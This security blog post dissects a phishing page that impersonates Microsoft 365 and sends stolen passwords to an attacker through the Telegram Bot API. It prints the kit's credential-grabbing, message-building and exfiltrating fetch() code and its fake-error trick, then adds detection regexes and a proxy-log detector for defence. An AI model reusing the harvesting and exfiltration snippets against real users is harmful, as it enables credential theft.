Inside a Telegram-Powered Phishing Kit

By Pritam_Rakshit_ on February 7, 2026 (Last modified: March 16, 2026)

Threat Brief

Behind the Curtain: How a Phishing Page Steals Credentials Using Telegram

A technical teardown of a real-world credential harvesting kit abusing cloud messaging APIs

This blog analyzes a malicious HTML phishing page designed to impersonate a Microsoft 365 login portal. Unlike traditional phishing infrastructure, this kit does not rely on a backend server or database. Instead, it exfiltrates credentials in real time using the Telegram Bot API.

Tags: Credential Harvesting, Telegram C2 | Severity: High

Where Are the Credentials Collected?

User credentials are captured directly from the browser DOM when the victim clicks the login button. No validation is performed against a legitimate service.

var x = $("#email").val();    // Email address
var y = $("#password").val(); // Password
var z = $("#tex").val();      // Phone / alternate email

How the Data Is Packaged

The phishing kit builds a structured message containing credentials along with environment metadata such as browser details, IP address, URL, and port.

let mff = " " + x
  + "\n\n psw: " + y
  + "\n\n num: " + z
  + "\n\n brw: " + browserVersion
  + "\n\n 1p: " + clientIp
  + "\n\n pot: " + port
  + "\n\n dir: " + dir;

Telegram as the Exfiltration Channel

Instead of sending data to an attacker-controlled server, the kit abuses Telegram’s Bot API to deliver stolen credentials instantly to the attacker’s chat.

fetch("https://api.telegram.org/bot<BOT_TOKEN>/sendMessage", {
  method: "POST",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ chat_id: "<CHAT_ID>", text: mff })
});

Routing the stolen data through a legitimate public API gives the attacker anonymity (only a bot token and chat ID are exposed, not a server), transport encryption (the Bot API is served over HTTPS, so the request looks like ordinary Telegram traffic), and resilience (there is no attacker-owned host to seize), which makes takedown and attribution significantly harder.
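The pattern described above can be recognised statically in a suspected phishing page. The following scanner is an added example (not code from the kit or from the original post); its token regex is an assumption based on the public Bot API token shape (bot id digits, a colon, then a secret string), and the sample source and token are constructed placeholders.

```javascript
// Added example: flag the Telegram-exfiltration kit pattern in a page's source.
// The token regex is an assumption (<bot id digits>:<secret>); tune it to real sightings.
const TELEGRAM_SEND = /api\.telegram\.org\/bot(\d+:[A-Za-z0-9_-]{30,})\/sendMessage/g;
const CHAT_ID = /chat_id\s*[:=]\s*["']?(-?\d+)/g;
const PASSWORD_READ = /\$\(\s*["'](#password|input:password)["']\s*\)\.val\(\)/;
const FAKE_ERROR = /\$\(\s*["']#error["']\s*\)\.show\(\)/;

function scanPageSource(src) {
  const tokens = [...src.matchAll(TELEGRAM_SEND)].map(m => m[1]);
  const chatIds = [...src.matchAll(CHAT_ID)].map(m => m[1]);
  const readsPassword = PASSWORD_READ.test(src);
  const showsFakeError = FAKE_ERROR.test(src);
  // A Bot API sendMessage call alone is suspicious; combined with a password-field read it is the kit.
  let severity = "none";
  if (tokens.length) severity = readsPassword ? "high" : "medium";
  return {
    severity,
    // The bot id (before the colon) is safe to record; never log the secret half of the token.
    botIds: tokens.map(t => t.split(":")[0]),
    redactedTokens: tokens.map(t => t.split(":")[0] + ":" + "*".repeat(t.split(":")[1].length)),
    chatIds,
    readsPassword,
    showsFakeError,
  };
}

// Constructed sample mirroring the kit's logic, with a placeholder token and chat id.
const SAMPLE = `
var x = $("#email").val(); var y = $("#password").val();
let mff = " " + x + "\\n\\n psw: " + y;
fetch("https://api.telegram.org/bot1234567890:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sendMessage", {
  method: "POST", headers: { "Content-Type": "application/json" },
  body: JSON.stringify({ chat_id: "987654321", text: mff }) });
$("#error").show(); $("input:password").val("");
`;

console.log(scanPageSource(SAMPLE));
```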

Why Victims See a Login Error

After credentials are successfully exfiltrated, the page intentionally displays a fake authentication error. This social engineering trick encourages victims to retry, often yielding multiple password submissions.

$("#error").show();
$("input:password").val("");

Indicators of Compromise (IOCs)

Type        Indicator                            Description
Network     api.telegram.org/bot*/sendMessage    Credential exfiltration endpoint
JavaScript  BOT_TOKEN, chat_id                   Hardcoded Telegram bot identifiers
Behavior    POST request after login click       Immediate data exfiltration

Detection & Mitigation

  • Block outbound access to api.telegram.org where not business-critical
  • Alert on browser-based POST requests to Telegram Bot API
  • Educate users on phishing pages impersonating Microsoft services
  • Deploy EDR rules for JavaScript credential harvesting patterns
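The first two items above can be applied to proxy logs. The detector below is an added example (not part of the original post); the log line format "<timestamp> <src_ip> <method> <url> "<user-agent>"" and the sample traffic are constructed, so adapt the parser to your own proxy's format.

```javascript
// Added example: alert on Bot API sendMessage calls, escalating browser-originated POSTs.
const LOG_LINE = /^(\S+) (\S+) (GET|POST) (\S+) "([^"]*)"$/;
const BOT_SEND = /^https?:\/\/api\.telegram\.org\/bot(\d+):[^/]+\/sendMessage/;

function parseLine(line) {
  const m = LOG_LINE.exec(line.trim());
  if (!m) return null;
  return { ts: m[1], src: m[2], method: m[3], url: m[4], ua: m[5] };
}

// allowedBotIds: bot ids your organisation legitimately uses (empty set = alert on all).
function evaluate(entry, allowedBotIds = new Set()) {
  const m = BOT_SEND.exec(entry.url);
  if (!m) return null;
  const botId = m[1];            // only the id is kept; the secret half is never recorded
  if (allowedBotIds.has(botId)) return null;
  const fromBrowser = /^Mozilla\//.test(entry.ua);
  return {
    ts: entry.ts,
    src: entry.src,
    botId,
    rule: fromBrowser && entry.method === "POST"
      ? "browser_post_to_telegram_bot_api"   // the kit's fetch() from a rendered page
      : "unexpected_telegram_bot_api_use",
  };
}

function detect(logText, allowedBotIds) {
  return logText.split("\n").map(parseLine).filter(Boolean)
    .map(e => evaluate(e, allowedBotIds)).filter(Boolean);
}

// Constructed sample log (not real traffic); tokens are placeholders.
const SAMPLE_LOG = `
2026-02-07T09:12:01Z 10.1.2.3 GET https://login.microsoftonline.com/ "Mozilla/5.0 (Windows NT 10.0) Chrome/121"
2026-02-07T09:12:44Z 10.1.2.3 POST https://api.telegram.org/bot1234567890:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/sendMessage "Mozilla/5.0 (Windows NT 10.0) Chrome/121"
2026-02-07T09:13:10Z 10.1.2.9 POST https://api.telegram.org/bot555000111:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB/sendMessage "python-requests/2.31"
`;

console.log(detect(SAMPLE_LOG));
```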

Final Thoughts

This phishing kit demonstrates how attackers increasingly rely on trusted cloud platforms for command-and-control and data exfiltration. Telegram-based C2 removes the need for traditional infrastructure and significantly lowers the barrier to entry for cybercrime.

Security Research Blog | Phishing & Threat Intelligence Analysis
